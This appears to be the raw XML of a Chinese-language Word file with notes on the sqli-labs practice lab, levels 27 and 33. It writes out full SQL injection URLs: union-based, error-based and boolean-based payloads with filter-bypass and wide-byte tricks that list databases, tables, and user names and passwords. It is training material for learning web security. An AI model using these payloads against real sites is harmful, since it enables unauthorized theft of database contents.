        <w:t>联合查询</w:t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所有数据库得名称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http://www.sqli.com/Less-27/?id=%0a-1'uunionnion %0a+seleseleselectctct%0a+1,%0a+2,%0a+(seleseleselectctct%0a+GROUP_CONCAT(schema_name)%0a+from%0a+information_schema.SCHEMATA)%0a'&amp;XDEBUG_SESSION_START=PHPSTORM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150" cy="1442720"/>
            <wp:effectExtent l="0" t="0" r="8890" b="508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ecurity数据库拥有得表名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http://www.sqli.com/Less-27/?id=%0a-1'uunionnion %0a+seleseleselectctct%0a+1,%0a+2,%0a+(seleseleselectctct%0a+GROUP_CONCAT(table_name)%0a+from%0a+information_schema.tables%0a+where%0a+table_schema%0a+=database())%0a'&amp;XDEBUG_SESSION_START=PHPSTORM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656080"/>
            <wp:effectExtent l="0" t="0" r="5080" b="508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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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689100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:docPr id="6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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-27/?id=%0a-1'uunionnion %0a+seleseleselectctct%0a+1,%0a+2,%0a+(seleseleselectctct%0a+GROUP_CONCAT(username)%0a+from%0a+users)%0a'&amp;XDEBUG_SESSION_START=PHPSTORM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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1137920"/>
            <wp:effectExtent l="0" t="0" r="14605" b="5080"/>
            <wp:docPr id="6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报错注入</w:t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所有数据库得名称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http://www.sqli.com/Less-27/?id=%0a-1'and%0aextractvalue(1,concat(0x7e,(selECT%0a group_concat(schema_name)%0a from%0a information_schema.SCHEMATA%0alimit%0a 0,1)))%0aor'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285240"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10160"/>
            <wp:docPr id="6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ecurity数据库拥有得表名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http://www.sqli.com/Less-27/?id=%0a-1'and%0aextractvalue(1,concat(0x7e,(selECT%0a group_concat(table_name)%0a from%0a information_schema.tables%0a where%0a table_schema%0a=database()%0a limit%0a 0,1)))%0aor'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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1237615"/>
            <wp:effectExtent l="0" t="0" r="14605" b="12065"/>
            <wp:docPr id="6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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-27/?id=%0a-1'and%0aextractvalue(1,concat(0x7e,(selECT%0a group_concat(column_name)%0a from%0a information_schema.columns%0a where%0a table_name%0a='users'%0a limit%0a 0,1)))%0aor'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1195070"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8890"/>
            <wp:docPr id="7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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-27/?id=%0a-1'and%0aextractvalue(1,concat(0x7e,(selECT%0a group_concat(username,password)%0a from%0a users%0a limit%0a 0,28)))%0aor'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366520"/>
            <wp:effectExtent l="0" t="0" r="3175" b="508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布尔注入</w:t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所有数据库得名称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www.sqli.com/Less-27/?id=1'%0aand %0a(ord((%0a sElEct %0asubstr((sElEct %0aschema_name %0afrom %0ainformation_schema.schemata %0alimit %0a0,1),1,1)</w:t>
            </w:r>
          </w:p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)))%0a = 105%0a or'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1385570"/>
            <wp:effectExtent l="0" t="0" r="8255" b="127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8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ecurity数据库拥有得表名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tabs>
                <w:tab w:val="left" w:pos="781"/>
              </w:tabs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www.sqli.com/Less-27/?id=1'%0aand %0a(ord((%0a sElEct %0asubstr((sElEct %0atable_name %0afrom %0ainformation_schema.tables%0a where%0a table_schema%0a =%0adatabase() %0alimit %0a0,1),1,1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="781"/>
              </w:tabs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)))%0a  &gt;97%0a or'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/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1212850"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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www.sqli.com/Less-27/?id=1'%0aand %0a(ord((%0a sElEct %0asubstr((sElEct %0acolumn_name %0afrom %0ainformation_schema.columns%0a where%0a table_name%0a =%0a'users' %0alimit %0a0,1),1,1)</w:t>
            </w:r>
          </w:p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)))%0a &gt; 97%0a or'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2245" cy="1388110"/>
            <wp:effectExtent l="0" t="0" r="10795" b="13970"/>
            <wp:docPr id="7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security数据库users表中的第一行数据的结果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www.sqli.com/Less-27/?id=1'%0aand %0a(ord((%0a sElEct %0asubstr((sElEct %0ausername %0afrom %0ausers %0alimit %0a0,1),1,1)</w:t>
            </w:r>
          </w:p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)))%0a &lt; 97%0a or'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511300"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12700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Chars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联合查询</w:t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所有数据库得名称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http://www.sqli.com/Less-33/?id=-1%df' union select 1,2,( select concat(schema_name) from information_schema.schemata limit 0,1) -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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1456690"/>
            <wp:effectExtent l="0" t="0" r="8255" b="635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ecurity数据库拥有得表名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http://www.sqli.com/Less-33/?id=-1%df' union select 1,2,( select concat(table_name) from information_schema.tables where table_schema = database() limit 3,1) -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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368425"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-33/?id=-1%df' union select 1,2,( select concat(column_name) from information_schema.columns where table_name = 0x75736572 limit 2,1) -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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1273175"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
            <wp:docPr id="7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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-33/?id=-1%df' union select 1,2,( select concat(column_name) from information_schema.columns where table_name = 0x75736572 limit 2,1) -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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tabs>
          <w:tab w:val="left" w:pos="5061"/>
        </w:tabs>
        <w:ind w:left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ab/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报错注入</w:t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所有数据库得名称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http://www.sqli.com/Less-33/?id=-1%df' and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata limit 0,28 ))) -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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1102995"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="8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ecurity数据库拥有得表名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http://www.sqli.com/Less-33/?id=-1%df' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,28 ))) -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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2880" cy="1094740"/>
            <wp:effectExtent l="0" t="0" r="10160" b="2540"/>
            <wp:docPr id="8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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-33/?id=-1%df' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273</w:t>
            </w:r>
          </w:p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limit 0,28 ))) -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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236980"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="8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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-33/?id=-1%df' and extractvalue(1,concat(0x7e,(select group_concat(username) from users</w:t>
            </w:r>
          </w:p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limit 0,28 ))) -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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209040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="10160"/>
            <wp:docPr id="8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布尔注入</w:t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所有数据库得名称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http://www.sqli.com/Less-33/?id=1%df' and ord((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select SUBSTR(((select concat(schema_name ) from information_schema.schemata limit 0,1)),1,1))) = 105 -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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254125"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10795"/>
            <wp:docPr id="8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ecurity数据库拥有得表名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http://www.sqli.com/Less-33/?id=1%df' and ord((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select SUBSTR(((select concat(table_name ) from information_schema.tables where table_schema = database() limit 0,1)),1,1))) &lt; 105 -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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1233805"/>
            <wp:effectExtent l="0" t="0" r="8255" b="635"/>
            <wp:docPr id="8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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-33/?id=1%df' and ord((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select SUBSTR(((select concat(column_name ) from information_schema.columns where table_name = 0x75736572 limit 0,1)),1,1))) &lt; 105 -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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2245" cy="1293495"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1905"/>
            <wp:docPr id="8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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-33/?id=1%df' and ord((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select SUBSTR(((select concat(username) fromusers limit 0,1)),1,1))) &lt; 105 -- %20&amp;XDEBUG_SESSION_START=PHPSTORM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71135" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="1905" b="9525"/>
            <wp:docPr id="8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5861F40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35861F4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32EC"/>
    <w:rsid w:val="000054E6"/>
    <w:rsid w:val="00077366"/>
    <w:rsid w:val="000F2C92"/>
    <w:rsid w:val="00207564"/>
    <w:rsid w:val="00226C55"/>
    <w:rsid w:val="002D1984"/>
    <w:rsid w:val="00442583"/>
    <w:rsid w:val="00570439"/>
    <w:rsid w:val="00671BB7"/>
    <w:rsid w:val="006F2DB4"/>
    <w:rsid w:val="008D71D3"/>
    <w:rsid w:val="008D74ED"/>
    <w:rsid w:val="00A60601"/>
    <w:rsid w:val="00A81C32"/>
    <w:rsid w:val="00AB67EE"/>
    <w:rsid w:val="00B72E76"/>
    <w:rsid w:val="00BD4778"/>
    <w:rsid w:val="00D21C01"/>
    <w:rsid w:val="00D27FC7"/>
    <w:rsid w:val="00D44E9A"/>
    <w:rsid w:val="00D832EC"/>
    <w:rsid w:val="00F27D00"/>
    <w:rsid w:val="00FD5880"/>
    <w:rsid w:val="010806D2"/>
    <w:rsid w:val="010F7F22"/>
    <w:rsid w:val="017A72AB"/>
    <w:rsid w:val="01A21A5E"/>
    <w:rsid w:val="01A33C2C"/>
    <w:rsid w:val="01B51E71"/>
    <w:rsid w:val="01B94FF4"/>
    <w:rsid w:val="01C36A61"/>
    <w:rsid w:val="021D64D7"/>
    <w:rsid w:val="025226DB"/>
    <w:rsid w:val="02855B19"/>
    <w:rsid w:val="028B2A52"/>
    <w:rsid w:val="03007A52"/>
    <w:rsid w:val="034C1678"/>
    <w:rsid w:val="03627889"/>
    <w:rsid w:val="036C2171"/>
    <w:rsid w:val="03BF327C"/>
    <w:rsid w:val="03DB2059"/>
    <w:rsid w:val="03EF4900"/>
    <w:rsid w:val="04151F2F"/>
    <w:rsid w:val="04155067"/>
    <w:rsid w:val="042039F0"/>
    <w:rsid w:val="04784E98"/>
    <w:rsid w:val="04DA1029"/>
    <w:rsid w:val="05084B9A"/>
    <w:rsid w:val="05470D63"/>
    <w:rsid w:val="05677E11"/>
    <w:rsid w:val="058B0D9C"/>
    <w:rsid w:val="0599582E"/>
    <w:rsid w:val="05E53B0E"/>
    <w:rsid w:val="06162C01"/>
    <w:rsid w:val="06974DB4"/>
    <w:rsid w:val="06EE4B65"/>
    <w:rsid w:val="07523123"/>
    <w:rsid w:val="07DC0969"/>
    <w:rsid w:val="07EB1CF2"/>
    <w:rsid w:val="09020D8D"/>
    <w:rsid w:val="090D5570"/>
    <w:rsid w:val="0920497F"/>
    <w:rsid w:val="09562A90"/>
    <w:rsid w:val="0A1A59E4"/>
    <w:rsid w:val="0A245B68"/>
    <w:rsid w:val="0A5455DC"/>
    <w:rsid w:val="0AC56A55"/>
    <w:rsid w:val="0B173A67"/>
    <w:rsid w:val="0B1C7534"/>
    <w:rsid w:val="0B400AFC"/>
    <w:rsid w:val="0B575C65"/>
    <w:rsid w:val="0BA60F24"/>
    <w:rsid w:val="0C340573"/>
    <w:rsid w:val="0C405C1D"/>
    <w:rsid w:val="0C64213C"/>
    <w:rsid w:val="0C6746F5"/>
    <w:rsid w:val="0C8A540D"/>
    <w:rsid w:val="0CAC02EE"/>
    <w:rsid w:val="0CB46C09"/>
    <w:rsid w:val="0CBD7EFA"/>
    <w:rsid w:val="0D564D31"/>
    <w:rsid w:val="0DD00D89"/>
    <w:rsid w:val="0E0D70E3"/>
    <w:rsid w:val="0E1B4FD2"/>
    <w:rsid w:val="0E310E6C"/>
    <w:rsid w:val="0E85218E"/>
    <w:rsid w:val="0E863B08"/>
    <w:rsid w:val="0EAC54B5"/>
    <w:rsid w:val="0ED527BE"/>
    <w:rsid w:val="0EF63913"/>
    <w:rsid w:val="0F2214F7"/>
    <w:rsid w:val="0F305AA4"/>
    <w:rsid w:val="0F995F59"/>
    <w:rsid w:val="0FA360E0"/>
    <w:rsid w:val="0FA920E6"/>
    <w:rsid w:val="0FC9551F"/>
    <w:rsid w:val="0FFD1C09"/>
    <w:rsid w:val="101E6560"/>
    <w:rsid w:val="10226D8B"/>
    <w:rsid w:val="10D0391A"/>
    <w:rsid w:val="111D0DD0"/>
    <w:rsid w:val="113F1FD0"/>
    <w:rsid w:val="119242E8"/>
    <w:rsid w:val="11C0705A"/>
    <w:rsid w:val="11FB7A81"/>
    <w:rsid w:val="12E76014"/>
    <w:rsid w:val="12F6665D"/>
    <w:rsid w:val="13305CF3"/>
    <w:rsid w:val="13312432"/>
    <w:rsid w:val="13833924"/>
    <w:rsid w:val="13A63B06"/>
    <w:rsid w:val="13D8344F"/>
    <w:rsid w:val="13F3704D"/>
    <w:rsid w:val="142410DC"/>
    <w:rsid w:val="14E81FDC"/>
    <w:rsid w:val="153D1DC5"/>
    <w:rsid w:val="15A501F8"/>
    <w:rsid w:val="15C824EE"/>
    <w:rsid w:val="163E65EE"/>
    <w:rsid w:val="1673234C"/>
    <w:rsid w:val="167B68DB"/>
    <w:rsid w:val="16B907FC"/>
    <w:rsid w:val="16C3328A"/>
    <w:rsid w:val="173630A5"/>
    <w:rsid w:val="17385C5A"/>
    <w:rsid w:val="17416078"/>
    <w:rsid w:val="17651BC0"/>
    <w:rsid w:val="17A276F6"/>
    <w:rsid w:val="17E014D9"/>
    <w:rsid w:val="180C17DA"/>
    <w:rsid w:val="181F0F7D"/>
    <w:rsid w:val="183D5BC6"/>
    <w:rsid w:val="18AB4EBA"/>
    <w:rsid w:val="18BD011A"/>
    <w:rsid w:val="18EF724F"/>
    <w:rsid w:val="19095B5C"/>
    <w:rsid w:val="190A29FB"/>
    <w:rsid w:val="19552B73"/>
    <w:rsid w:val="197260A9"/>
    <w:rsid w:val="19D57975"/>
    <w:rsid w:val="19F307D7"/>
    <w:rsid w:val="1A262ACB"/>
    <w:rsid w:val="1A66762A"/>
    <w:rsid w:val="1AAD2089"/>
    <w:rsid w:val="1AB1419D"/>
    <w:rsid w:val="1B2A6DBD"/>
    <w:rsid w:val="1B2B3CB2"/>
    <w:rsid w:val="1B3F2B58"/>
    <w:rsid w:val="1BDF434F"/>
    <w:rsid w:val="1BF2334A"/>
    <w:rsid w:val="1C335361"/>
    <w:rsid w:val="1CCE1FFE"/>
    <w:rsid w:val="1D026EFE"/>
    <w:rsid w:val="1D0D1C69"/>
    <w:rsid w:val="1D1974EB"/>
    <w:rsid w:val="1D807E55"/>
    <w:rsid w:val="1DA13C18"/>
    <w:rsid w:val="1DAE2852"/>
    <w:rsid w:val="1DB527B2"/>
    <w:rsid w:val="1E2667C2"/>
    <w:rsid w:val="1E520ACE"/>
    <w:rsid w:val="1E676FD6"/>
    <w:rsid w:val="1EA77382"/>
    <w:rsid w:val="1EA937ED"/>
    <w:rsid w:val="1EBE4D89"/>
    <w:rsid w:val="1ECE76AD"/>
    <w:rsid w:val="1EDD7F26"/>
    <w:rsid w:val="1F1800FA"/>
    <w:rsid w:val="1FDB0C1A"/>
    <w:rsid w:val="1FDC1578"/>
    <w:rsid w:val="1FE42B63"/>
    <w:rsid w:val="1FE51ADF"/>
    <w:rsid w:val="1FF01832"/>
    <w:rsid w:val="200C3ADF"/>
    <w:rsid w:val="200C5D5D"/>
    <w:rsid w:val="203E4BFA"/>
    <w:rsid w:val="20E96F55"/>
    <w:rsid w:val="20F86976"/>
    <w:rsid w:val="21557BF6"/>
    <w:rsid w:val="216033AA"/>
    <w:rsid w:val="22553619"/>
    <w:rsid w:val="227209A4"/>
    <w:rsid w:val="227E6C5C"/>
    <w:rsid w:val="228876A3"/>
    <w:rsid w:val="229F6318"/>
    <w:rsid w:val="22AD24DC"/>
    <w:rsid w:val="22F4457B"/>
    <w:rsid w:val="23B247DB"/>
    <w:rsid w:val="23E61516"/>
    <w:rsid w:val="244061F3"/>
    <w:rsid w:val="24546ED5"/>
    <w:rsid w:val="245C3E61"/>
    <w:rsid w:val="246401FE"/>
    <w:rsid w:val="24840B71"/>
    <w:rsid w:val="24A8140C"/>
    <w:rsid w:val="25093CFA"/>
    <w:rsid w:val="25414FF7"/>
    <w:rsid w:val="255E7545"/>
    <w:rsid w:val="2582357A"/>
    <w:rsid w:val="25A81F4A"/>
    <w:rsid w:val="25AA7ACA"/>
    <w:rsid w:val="25F8317D"/>
    <w:rsid w:val="26073657"/>
    <w:rsid w:val="2608649A"/>
    <w:rsid w:val="266020D9"/>
    <w:rsid w:val="267B5C71"/>
    <w:rsid w:val="26C73FF0"/>
    <w:rsid w:val="27050CA1"/>
    <w:rsid w:val="2707357F"/>
    <w:rsid w:val="27334834"/>
    <w:rsid w:val="27671AC9"/>
    <w:rsid w:val="278B2F42"/>
    <w:rsid w:val="27B70BDE"/>
    <w:rsid w:val="27FD5ED4"/>
    <w:rsid w:val="28163948"/>
    <w:rsid w:val="2846236B"/>
    <w:rsid w:val="28B33A53"/>
    <w:rsid w:val="28BD1C56"/>
    <w:rsid w:val="29100B3E"/>
    <w:rsid w:val="292423FE"/>
    <w:rsid w:val="293A499C"/>
    <w:rsid w:val="298308B0"/>
    <w:rsid w:val="29C13E31"/>
    <w:rsid w:val="2A790CF2"/>
    <w:rsid w:val="2AB17BFC"/>
    <w:rsid w:val="2AB65E06"/>
    <w:rsid w:val="2AF45454"/>
    <w:rsid w:val="2AF5052C"/>
    <w:rsid w:val="2B3978B3"/>
    <w:rsid w:val="2B82502F"/>
    <w:rsid w:val="2B89504C"/>
    <w:rsid w:val="2C48219C"/>
    <w:rsid w:val="2C556C4D"/>
    <w:rsid w:val="2D05051A"/>
    <w:rsid w:val="2D107A9E"/>
    <w:rsid w:val="2D180CB4"/>
    <w:rsid w:val="2D836BA6"/>
    <w:rsid w:val="2DA33BC2"/>
    <w:rsid w:val="2DCA3AB9"/>
    <w:rsid w:val="2DCF6C82"/>
    <w:rsid w:val="2DD17EB5"/>
    <w:rsid w:val="2DD96BB5"/>
    <w:rsid w:val="2DF4019B"/>
    <w:rsid w:val="2E564076"/>
    <w:rsid w:val="2E7B0F74"/>
    <w:rsid w:val="2E927680"/>
    <w:rsid w:val="2E9B6C34"/>
    <w:rsid w:val="2EAD2033"/>
    <w:rsid w:val="2EEF1141"/>
    <w:rsid w:val="2F473463"/>
    <w:rsid w:val="2F5919D9"/>
    <w:rsid w:val="2F5B223E"/>
    <w:rsid w:val="2F616D01"/>
    <w:rsid w:val="2F801D8E"/>
    <w:rsid w:val="2F917EA6"/>
    <w:rsid w:val="2FBA4E97"/>
    <w:rsid w:val="2FC45DE1"/>
    <w:rsid w:val="2FCC4529"/>
    <w:rsid w:val="30964AB3"/>
    <w:rsid w:val="30AE704A"/>
    <w:rsid w:val="30E4461F"/>
    <w:rsid w:val="310B6D17"/>
    <w:rsid w:val="3158388C"/>
    <w:rsid w:val="31CF3616"/>
    <w:rsid w:val="31D47D16"/>
    <w:rsid w:val="32122E10"/>
    <w:rsid w:val="32B01C47"/>
    <w:rsid w:val="32BE23FE"/>
    <w:rsid w:val="32D069CD"/>
    <w:rsid w:val="32D919FA"/>
    <w:rsid w:val="32E200DB"/>
    <w:rsid w:val="32E462CC"/>
    <w:rsid w:val="32E87957"/>
    <w:rsid w:val="32ED0155"/>
    <w:rsid w:val="32FC2C72"/>
    <w:rsid w:val="330C211A"/>
    <w:rsid w:val="3335434F"/>
    <w:rsid w:val="33422CB7"/>
    <w:rsid w:val="339E18F0"/>
    <w:rsid w:val="348D5CBB"/>
    <w:rsid w:val="349A16D1"/>
    <w:rsid w:val="351C133E"/>
    <w:rsid w:val="354101C1"/>
    <w:rsid w:val="35583D40"/>
    <w:rsid w:val="35701749"/>
    <w:rsid w:val="359B055C"/>
    <w:rsid w:val="36893033"/>
    <w:rsid w:val="375C3C5F"/>
    <w:rsid w:val="375D3972"/>
    <w:rsid w:val="37C23309"/>
    <w:rsid w:val="37C83762"/>
    <w:rsid w:val="381A76DC"/>
    <w:rsid w:val="38627A94"/>
    <w:rsid w:val="38790661"/>
    <w:rsid w:val="388F34E9"/>
    <w:rsid w:val="389361B0"/>
    <w:rsid w:val="38E8132F"/>
    <w:rsid w:val="38F30DA1"/>
    <w:rsid w:val="39026CDE"/>
    <w:rsid w:val="391F47AD"/>
    <w:rsid w:val="398413D4"/>
    <w:rsid w:val="39A237EB"/>
    <w:rsid w:val="39A76FC3"/>
    <w:rsid w:val="39D34E1E"/>
    <w:rsid w:val="3A2D0C81"/>
    <w:rsid w:val="3AC70E7C"/>
    <w:rsid w:val="3B297094"/>
    <w:rsid w:val="3B2E6746"/>
    <w:rsid w:val="3B354C27"/>
    <w:rsid w:val="3B5F5307"/>
    <w:rsid w:val="3B766EBD"/>
    <w:rsid w:val="3C070208"/>
    <w:rsid w:val="3C0D7233"/>
    <w:rsid w:val="3C115149"/>
    <w:rsid w:val="3C37398F"/>
    <w:rsid w:val="3C3751D7"/>
    <w:rsid w:val="3C82135F"/>
    <w:rsid w:val="3CC53FAD"/>
    <w:rsid w:val="3CCB551B"/>
    <w:rsid w:val="3D130D94"/>
    <w:rsid w:val="3D30462A"/>
    <w:rsid w:val="3D3E7138"/>
    <w:rsid w:val="3DF212C0"/>
    <w:rsid w:val="3DFB0289"/>
    <w:rsid w:val="3E2D6801"/>
    <w:rsid w:val="3E5D29D9"/>
    <w:rsid w:val="3E69421C"/>
    <w:rsid w:val="3E6C07EE"/>
    <w:rsid w:val="3E7E1A19"/>
    <w:rsid w:val="3E8E3F7E"/>
    <w:rsid w:val="3EAF23AA"/>
    <w:rsid w:val="3EB163E9"/>
    <w:rsid w:val="3EB61424"/>
    <w:rsid w:val="3F4A3681"/>
    <w:rsid w:val="3F6D66D3"/>
    <w:rsid w:val="3F8A66BE"/>
    <w:rsid w:val="3FE23549"/>
    <w:rsid w:val="40040505"/>
    <w:rsid w:val="4019434D"/>
    <w:rsid w:val="402723C4"/>
    <w:rsid w:val="403878E2"/>
    <w:rsid w:val="406660F9"/>
    <w:rsid w:val="40B338EB"/>
    <w:rsid w:val="40F85FE7"/>
    <w:rsid w:val="41667AF9"/>
    <w:rsid w:val="41721335"/>
    <w:rsid w:val="41B02BC5"/>
    <w:rsid w:val="41B66CD7"/>
    <w:rsid w:val="41D77E0F"/>
    <w:rsid w:val="423661A4"/>
    <w:rsid w:val="42397EEE"/>
    <w:rsid w:val="42C05C35"/>
    <w:rsid w:val="42C5130A"/>
    <w:rsid w:val="43730972"/>
    <w:rsid w:val="43923E19"/>
    <w:rsid w:val="439414AE"/>
    <w:rsid w:val="43D3203F"/>
    <w:rsid w:val="43F2405F"/>
    <w:rsid w:val="4404513A"/>
    <w:rsid w:val="443D17FA"/>
    <w:rsid w:val="44753108"/>
    <w:rsid w:val="448707A3"/>
    <w:rsid w:val="44922CC8"/>
    <w:rsid w:val="449254B6"/>
    <w:rsid w:val="44935033"/>
    <w:rsid w:val="44C9618E"/>
    <w:rsid w:val="451C3067"/>
    <w:rsid w:val="45377902"/>
    <w:rsid w:val="4556563C"/>
    <w:rsid w:val="455C6143"/>
    <w:rsid w:val="458C24F3"/>
    <w:rsid w:val="45DA1A93"/>
    <w:rsid w:val="462A4DE9"/>
    <w:rsid w:val="46716305"/>
    <w:rsid w:val="46AC742F"/>
    <w:rsid w:val="46F40896"/>
    <w:rsid w:val="47436194"/>
    <w:rsid w:val="4758377E"/>
    <w:rsid w:val="47613B1C"/>
    <w:rsid w:val="47896961"/>
    <w:rsid w:val="4795724F"/>
    <w:rsid w:val="48040643"/>
    <w:rsid w:val="483928E8"/>
    <w:rsid w:val="485B6D74"/>
    <w:rsid w:val="48850524"/>
    <w:rsid w:val="488E2BB3"/>
    <w:rsid w:val="48911657"/>
    <w:rsid w:val="48CA7A79"/>
    <w:rsid w:val="48F42E80"/>
    <w:rsid w:val="496216E9"/>
    <w:rsid w:val="49984A84"/>
    <w:rsid w:val="499A7A62"/>
    <w:rsid w:val="49AC7181"/>
    <w:rsid w:val="49D275C7"/>
    <w:rsid w:val="49F45A2A"/>
    <w:rsid w:val="4A1A5F0B"/>
    <w:rsid w:val="4A1E6903"/>
    <w:rsid w:val="4A200654"/>
    <w:rsid w:val="4A4B58B2"/>
    <w:rsid w:val="4AC73C8A"/>
    <w:rsid w:val="4B1103DD"/>
    <w:rsid w:val="4B521C66"/>
    <w:rsid w:val="4B7B6A71"/>
    <w:rsid w:val="4B887E6A"/>
    <w:rsid w:val="4B9E3A5C"/>
    <w:rsid w:val="4BA061A6"/>
    <w:rsid w:val="4BF26E49"/>
    <w:rsid w:val="4BFF66CB"/>
    <w:rsid w:val="4C0B421A"/>
    <w:rsid w:val="4C1D6EBF"/>
    <w:rsid w:val="4C504A5C"/>
    <w:rsid w:val="4C6A6F25"/>
    <w:rsid w:val="4C9A6B17"/>
    <w:rsid w:val="4CB3155A"/>
    <w:rsid w:val="4CC12A4D"/>
    <w:rsid w:val="4CD70FFD"/>
    <w:rsid w:val="4D277AC8"/>
    <w:rsid w:val="4E404A6D"/>
    <w:rsid w:val="4E430850"/>
    <w:rsid w:val="4E506242"/>
    <w:rsid w:val="4E54231A"/>
    <w:rsid w:val="4E62566B"/>
    <w:rsid w:val="4EE32CD6"/>
    <w:rsid w:val="4F6D1980"/>
    <w:rsid w:val="4F733AD1"/>
    <w:rsid w:val="4F944860"/>
    <w:rsid w:val="4FC302C3"/>
    <w:rsid w:val="4FC351B7"/>
    <w:rsid w:val="4FF2288D"/>
    <w:rsid w:val="50BF614D"/>
    <w:rsid w:val="50C74415"/>
    <w:rsid w:val="50F55342"/>
    <w:rsid w:val="511A2B65"/>
    <w:rsid w:val="51475B41"/>
    <w:rsid w:val="51755114"/>
    <w:rsid w:val="51BC2AC0"/>
    <w:rsid w:val="5211073F"/>
    <w:rsid w:val="525836FC"/>
    <w:rsid w:val="5295270E"/>
    <w:rsid w:val="52D77AAB"/>
    <w:rsid w:val="52FB5D40"/>
    <w:rsid w:val="5308728E"/>
    <w:rsid w:val="531A7265"/>
    <w:rsid w:val="536A387D"/>
    <w:rsid w:val="53800685"/>
    <w:rsid w:val="53991164"/>
    <w:rsid w:val="54063CCF"/>
    <w:rsid w:val="54122F97"/>
    <w:rsid w:val="542B3F5F"/>
    <w:rsid w:val="54424F39"/>
